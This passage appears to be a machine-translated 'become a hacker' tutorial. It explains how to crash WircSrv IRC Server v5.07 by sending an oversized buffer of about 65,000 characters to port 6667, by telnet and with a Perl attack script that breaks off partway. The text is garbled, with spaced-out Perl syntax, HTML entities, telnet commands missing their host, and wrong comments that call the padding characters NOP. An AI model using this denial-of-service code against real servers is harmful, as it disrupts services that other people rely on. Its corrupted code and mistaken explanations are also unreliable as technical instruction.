The Most Basic Understanding to Become a Hacker - Part

The Most Basic Understanding to Become a Hacker - Part
42. ) DoS injection technology into WircSrv Irc Server v5.07:

WircSrv IRC is a popular IRC server on the Internet. It is vulnerable to hackers if a hacker sends a packets greater than 65000 characters to Port 6667.
You can do this by Telnet to WircSrv on Port 6667:

If you use Unix:

[$ telnet 6667
Trying ...
Connected to
Escape character is `^]`.

Windows is similar:

telnet 6667

Note: [buffer] is the data packet equivalent to 65000 characters.
However, we will crash it very simply with the following code. (Look at the code and decode the command itself, which is also one of the ways of training for the reflection of hackers. when they study, let's analyze it fundamentally):

# / usr / bin / perl # & lt; == This code tells us that it is for perl commands
use Getopt :: Std;
use Socket;
getopts (`s:`,% args);
if (! defined ($ args {s})) {& amp; usage;}
($ serv, $ port, $ foo, $ number, $ date, $ buf, $ in_addr, $ pa ddr, $ proto);
$ foo = `` A``; # This is NOP
$ number = `` 65000``; # These are all NOP numbers
$ data. = $ foo x $ number; # result of $ foo times $ number
$ serv = $ args {s}; # remote server control commands
$ port = 6667; # remote console command, it defaults to 6667
$ buf = `` $ data``;
$ in_addr = (gethostbyname ($ serv)) [4]